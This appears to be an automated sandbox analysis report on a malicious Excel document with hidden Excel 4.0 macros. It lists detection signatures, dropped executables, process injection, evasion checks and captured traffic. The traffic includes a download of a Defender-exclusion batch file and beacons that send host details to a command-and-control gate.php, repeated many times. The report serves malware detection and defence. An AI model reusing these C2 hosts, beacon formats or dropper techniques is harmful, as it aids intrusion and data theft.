Analysis Report 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls

Overview

General Information

Sample Name:	1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls
Analysis ID:	335896
MD5:	4468e0175c68f3751fc2027f1e42ca0c
SHA1:	c19aff367853c61d750b2da47623b69d8c1b42bb
SHA256:	4054344f07e1877b2cbb1a13c9bee260f0ae1f41c713374ccb9b130e3bae19a6
Tags:	SilentBuilderxls
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

.NET source code contains potential unpacker

Document exploit detected (process start blacklist hit)

Drops PE files with benign system names

Found C&C like URL pattern

Found Excel 4.0 Macro with suspicious formulas

Found obfuscated Excel 4.0 Macro

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Obfuscated command line found

Powershell drops PE file

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Suspicious Svchost Process

Sigma detected: System File Execution Location Anomaly

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to download and execute files (via powershell)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Obfuscated Powershell

Adds / modifies Windows certificates

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document contains embedded VBA macros

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Yara signature match

Classification

Signatures

AV Detection:

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\svchost.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\GvthaHtVzpRh.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Joe Sandbox ML: detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\cmd.exe

Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	24_2_00B35D70
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	24_2_00B35D60
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then sub esp, 2Ch	27_2_0043204F
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00460436
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00474483
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00468684
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00460816
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push esi	27_2_004688D4
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebx	27_2_00462A48
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ecx], 00491728h	27_2_00468D03
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov edx, dword ptr [ecx+08h]	27_2_00428FFC
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push edi	27_2_00455030
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebx	27_2_00455030
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_0045D0F4
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00467148
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then sub esp, 1Ch	27_2_004231D0
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00467278
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ecx], 00491AB0h	27_2_0046D2A2
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push edi	27_2_00455390
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebx	27_2_00455390
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then sub esp, 1Ch	27_2_00423493
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_0046157C
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_0047D657
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00451650
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_004616DB
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebx	27_2_004737E7
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ecx], 00492088h	27_2_0046B7B4
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	27_2_00427830
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ecx], 00492108h	27_2_0046B8B4
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov eax, dword ptr [0048E55Ch]	27_2_004558B2
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00477930
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebx	27_2_004739A7
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00451BD0
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00451BD0
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00451BD0
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00467BB4
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00431C2F
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push edi	27_2_00471CD0
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_0044DD5D
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00427DD0
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push esi	27_2_00467E04
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_0044DE0B
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00431E3F
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ecx], 004921A0h	27_2_00477EB2
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	32_2_02015598
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	39_2_00804FD0

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: cutt.ly

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 172.67.8.238:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 172.67.8.238:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2022985 ET TROJAN Trojan Generic - POST To gate.php with no accept headers 192.168.2.22:49171 -> 172.67.167.122:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49171 -> 172.67.167.122:80
Source: Traffic	Snort IDS: 2026071 ET TROJAN W32.FakeEzQ.kr Checkin 192.168.2.22:49171 -> 172.67.167.122:80
Source: Traffic	Snort IDS: 2022985 ET TROJAN Trojan Generic - POST To gate.php with no accept headers 192.168.2.22:49172 -> 172.67.167.122:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49172 -> 172.67.167.122:80
Source: Traffic	Snort IDS: 2026071 ET TROJAN W32.FakeEzQ.kr Checkin 192.168.2.22:49172 -> 172.67.167.122:80

Found C&C like URL pattern

Source: global traffic	HTTP traffic detected: POST /cc/gate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: http genericHost: cryptodual.netContent-Length: 87Cache-Control: no-cacheData Raw: 48 57 49 44 3d 7b 38 34 36 65 65 33 34 30 2d 37 30 33 39 2d 31 31 64 65 2d 39 64 32 30 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 26 6e 61 6d 65 3d 41 6c 62 75 73 2f 30 36 31 35 34 34 26 6f 73 3d 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c Data Ascii: HWID={846ee340-7039-11de-9d20-806e6f6e6963}&name=user/061544&os=Windows 7 Professional
Source: global traffic	HTTP traffic detected: POST /cc/gate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: http genericHost: cryptodual.netContent-Length: 87Cache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161Data Raw: 48 57 49 44 3d 7b 38 34 36 65 65 33 34 30 2d 37 30 33 39 2d 31 31 64 65 2d 39 64 32 30 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 26 6e 61 6d 65 3d 41 6c 62 75 73 2f 30 36 31 35 34 34 26 6f 73 3d 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c Data Ascii: HWID={846ee340-7039-11de-9d20-806e6f6e6963}&name=user/061544&os=Windows 7 Professional

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 172.67.8.238 172.67.8.238
Source: Joe Sandbox View	IP Address: 37.46.150.139 37.46.150.139

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139

Source: global traffic	HTTP traffic detected: GET /bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
